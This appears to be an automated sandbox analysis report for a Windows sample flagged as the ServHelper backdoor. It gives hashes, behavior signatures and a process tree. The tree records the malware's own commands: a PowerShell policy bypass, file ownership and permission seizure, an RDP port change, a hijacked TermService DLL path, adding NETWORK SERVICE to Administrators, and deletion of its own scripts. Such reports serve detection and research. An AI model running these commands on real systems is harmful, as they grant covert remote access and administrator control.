Analysis
-
max time kernel
142s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
30-03-2024 02:34
Static task
static1
Behavioral task
behavioral1
Sample
3170bcf7de646f8612910ab98f6d1861_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
3170bcf7de646f8612910ab98f6d1861_JaffaCakes118.exe
Resource
win10v2004-20240226-en
General
-
Target
3170bcf7de646f8612910ab98f6d1861_JaffaCakes118.exe
-
Size
4.3MB
-
MD5
3170bcf7de646f8612910ab98f6d1861
-
SHA1
71d81b3dd1747cf1c0e744fcb1809d6522eab902
-
SHA256
bea9da3ee504f62fc074963332e96297c7fff5efb2999efc946bc518a3765c00
-
SHA512
f232d67902f1b7fc3eb73efc7df575dcac83f5943e613e61982c78c9d4c47b18eadd6d87f2b4d040ec4125f4770a33f03b5743b3b18c34ab622b258f913b91c5
-
SSDEEP
98304:OcaOt2a4P7cEg9j1rQT6YHyV4QWfjmRbM4rmqof6+oO+e:x4a4ndrE4QWfjm1M4rm1fqFe
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exepid process 3684 icacls.exe 332 icacls.exe 1432 icacls.exe 2880 icacls.exe 2340 icacls.exe 3624 takeown.exe 2044 icacls.exe 3112 icacls.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" reg.exe -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 2880 icacls.exe 2340 icacls.exe 3624 takeown.exe 2044 icacls.exe 3112 icacls.exe 3684 icacls.exe 332 icacls.exe 1432 icacls.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe File created C:\Windows\SysWOW64\rfxvmt.dll powershell.exe -
Drops file in Windows directory 8 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\shellbrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 3752 powershell.exe 3752 powershell.exe 2364 powershell.exe 2364 powershell.exe 4988 powershell.exe 4988 powershell.exe 1076 powershell.exe 1076 powershell.exe 3752 powershell.exe 3752 powershell.exe 3752 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 652 -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeicacls.exedescription pid process Token: SeDebugPrivilege 3752 powershell.exe Token: SeDebugPrivilege 2364 powershell.exe Token: SeDebugPrivilege 4988 powershell.exe Token: SeDebugPrivilege 1076 powershell.exe Token: SeRestorePrivilege 3112 icacls.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
3170bcf7de646f8612910ab98f6d1861_JaffaCakes118.exepowershell.execsc.exenet.execmd.execmd.exedescription pid process target process PID 5064 wrote to memory of 3752 5064 3170bcf7de646f8612910ab98f6d1861_JaffaCakes118.exe powershell.exe PID 5064 wrote to memory of 3752 5064 3170bcf7de646f8612910ab98f6d1861_JaffaCakes118.exe powershell.exe PID 5064 wrote to memory of 3752 5064 3170bcf7de646f8612910ab98f6d1861_JaffaCakes118.exe powershell.exe PID 3752 wrote to memory of 776 3752 powershell.exe csc.exe PID 3752 wrote to memory of 776 3752 powershell.exe csc.exe PID 3752 wrote to memory of 776 3752 powershell.exe csc.exe PID 776 wrote to memory of 4228 776 csc.exe cvtres.exe PID 776 wrote to memory of 4228 776 csc.exe cvtres.exe PID 776 wrote to memory of 4228 776 csc.exe cvtres.exe PID 3752 wrote to memory of 2364 3752 powershell.exe powershell.exe PID 3752 wrote to memory of 2364 3752 powershell.exe powershell.exe PID 3752 wrote to memory of 2364 3752 powershell.exe powershell.exe PID 3752 wrote to memory of 4988 3752 powershell.exe powershell.exe PID 3752 wrote to memory of 4988 3752 powershell.exe powershell.exe PID 3752 wrote to memory of 4988 3752 powershell.exe powershell.exe PID 3752 wrote to memory of 1076 3752 powershell.exe powershell.exe PID 3752 wrote to memory of 1076 3752 powershell.exe powershell.exe PID 3752 wrote to memory of 1076 3752 powershell.exe powershell.exe PID 3752 wrote to memory of 3624 3752 powershell.exe takeown.exe PID 3752 wrote to memory of 3624 3752 powershell.exe takeown.exe PID 3752 wrote to memory of 3624 3752 powershell.exe takeown.exe PID 3752 wrote to memory of 2044 3752 powershell.exe icacls.exe PID 3752 wrote to memory of 2044 3752 powershell.exe icacls.exe PID 3752 wrote to memory of 2044 3752 powershell.exe icacls.exe PID 3752 wrote to memory of 3112 3752 powershell.exe icacls.exe PID 3752 wrote to memory of 3112 3752 powershell.exe icacls.exe PID 3752 wrote to memory of 3112 3752 powershell.exe icacls.exe PID 3752 wrote to memory of 3684 3752 powershell.exe icacls.exe PID 3752 wrote to memory of 3684 3752 powershell.exe icacls.exe PID 3752 wrote to memory of 3684 3752 powershell.exe icacls.exe PID 3752 wrote to memory of 332 3752 powershell.exe icacls.exe PID 3752 wrote to memory of 332 3752 powershell.exe icacls.exe PID 3752 wrote to memory of 332 3752 powershell.exe icacls.exe PID 3752 wrote to memory of 1432 3752 powershell.exe icacls.exe PID 3752 wrote to memory of 1432 3752 powershell.exe icacls.exe PID 3752 wrote to memory of 1432 3752 powershell.exe icacls.exe PID 3752 wrote to memory of 2880 3752 powershell.exe icacls.exe PID 3752 wrote to memory of 2880 3752 powershell.exe icacls.exe PID 3752 wrote to memory of 2880 3752 powershell.exe icacls.exe PID 3752 wrote to memory of 2340 3752 powershell.exe icacls.exe PID 3752 wrote to memory of 2340 3752 powershell.exe icacls.exe PID 3752 wrote to memory of 2340 3752 powershell.exe icacls.exe PID 3752 wrote to memory of 4776 3752 powershell.exe reg.exe PID 3752 wrote to memory of 4776 3752 powershell.exe reg.exe PID 3752 wrote to memory of 4776 3752 powershell.exe reg.exe PID 3752 wrote to memory of 1948 3752 powershell.exe reg.exe PID 3752 wrote to memory of 1948 3752 powershell.exe reg.exe PID 3752 wrote to memory of 1948 3752 powershell.exe reg.exe PID 3752 wrote to memory of 540 3752 powershell.exe reg.exe PID 3752 wrote to memory of 540 3752 powershell.exe reg.exe PID 3752 wrote to memory of 540 3752 powershell.exe reg.exe PID 3752 wrote to memory of 3636 3752 powershell.exe net.exe PID 3752 wrote to memory of 3636 3752 powershell.exe net.exe PID 3752 wrote to memory of 3636 3752 powershell.exe net.exe PID 3636 wrote to memory of 2668 3636 net.exe net1.exe PID 3636 wrote to memory of 2668 3636 net.exe net1.exe PID 3636 wrote to memory of 2668 3636 net.exe net1.exe PID 3752 wrote to memory of 3848 3752 powershell.exe cmd.exe PID 3752 wrote to memory of 3848 3752 powershell.exe cmd.exe PID 3752 wrote to memory of 3848 3752 powershell.exe cmd.exe PID 3848 wrote to memory of 1904 3848 cmd.exe cmd.exe PID 3848 wrote to memory of 1904 3848 cmd.exe cmd.exe PID 3848 wrote to memory of 1904 3848 cmd.exe cmd.exe PID 1904 wrote to memory of 404 1904 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3170bcf7de646f8612910ab98f6d1861_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\3170bcf7de646f8612910ab98f6d1861_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3752 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dmhhxp5a\dmhhxp5a.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:776 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES412F.tmp" "c:\Users\Admin\AppData\Local\Temp\dmhhxp5a\CSCDF28400DD5484A11B74C528EA7680A0.TMP"4⤵PID:4228
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4988
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1076
-
-
C:\Windows\SysWOW64\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3624
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2044
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3112
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3684
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:332
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1432
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2880
-
-
C:\Windows\SysWOW64\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:4776
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Sets DLL path for service in the registry
- Modifies registry key
PID:1948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:540
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:3636 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:2668
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:3848 -
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1904 -
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵PID:404
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:4816
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:848
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵PID:3728
-
C:\Windows\SysWOW64\net.exenet start TermService5⤵PID:3560
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3928
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:4292
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1696
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5cc389dfcb3452ca013da39252f2450eb
SHA13ee4da0afcb0b4e6fe9343c40fa4fb67fb53b176
SHA256a38536552f2a0774e3429b3b0f5d901910c3a7075c6c752c90afc2d72e2fcc08
SHA512054356fdc744ad358ef1493b589ef8056af0a7427389451553f22b39ec1ec2fad53ae33811e8f369c2b97448c625997336a4fcd078dfad56ba9e9dae8d1ab7ea
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD585d74c10b31524cc88898f5502a1c8cc
SHA1460a17436b817a76bce1dad84980b82feceb9b5d
SHA2567094b8cb5decaf6efbb5dc6871c40f557652c2c43583111b89537bd4fadaa41a
SHA512a4074c0107f750bc616f2b5cc53daed17d29d3cebc48e64191c42451b5094ca52579ad2dd31acba0d619124c95a309a030785812976ab7284c84d46982768184
-
Filesize
2.5MB
MD5794bf0ae26a7efb0c516cf4a7692c501
SHA1c8f81d0ddd4d360dcbe0814a04a86748f99c6ff2
SHA25697753653d52aaa961e4d1364b5b43551c76da9bb19e12f741bd67c986259e825
SHA51220c97972a1256375157f82a859ce4936613fe109d54c63bbec25734edc3a567ca976b342a21ef5f25571b3c1959afe618ad9f9f17a817cfd731d1504541b1a75
-
Filesize
1KB
MD528d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
Filesize
652B
MD5188b9913939231812a2fc07cd7571bfa
SHA10cbd3092f542d709d055375a37c0a2dc23dd421e
SHA256d7b5f2105d5340805d8b1bd10762286351348622778139263df5c8900086edf1
SHA512aeb59d1bb30b76ec233f3faed749765db897f63c30a8133dcfbb91ac354d9c0291520eec4c69e857f70f17a48c2a67299371f71df557c0164156509fcd514c83
-
Filesize
424B
MD59f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
Filesize
369B
MD5730189806b58f09583665ebc67e124a2
SHA139d0a1da7f0ed90e27f3978581ff7bf7706c8a9f
SHA2560b63ebba6aaeb9e8e4462dc6f382b71648697bbfbca88da54fea3dff281e5e0e
SHA512880213100dd1abdde570b6f57b7c7320ee8a1ca9e30fb9999394fa85f5caf8f0b207ece87d2d91dd3312e2f8fc2667dca508541ef8eb874498577363c3106dd5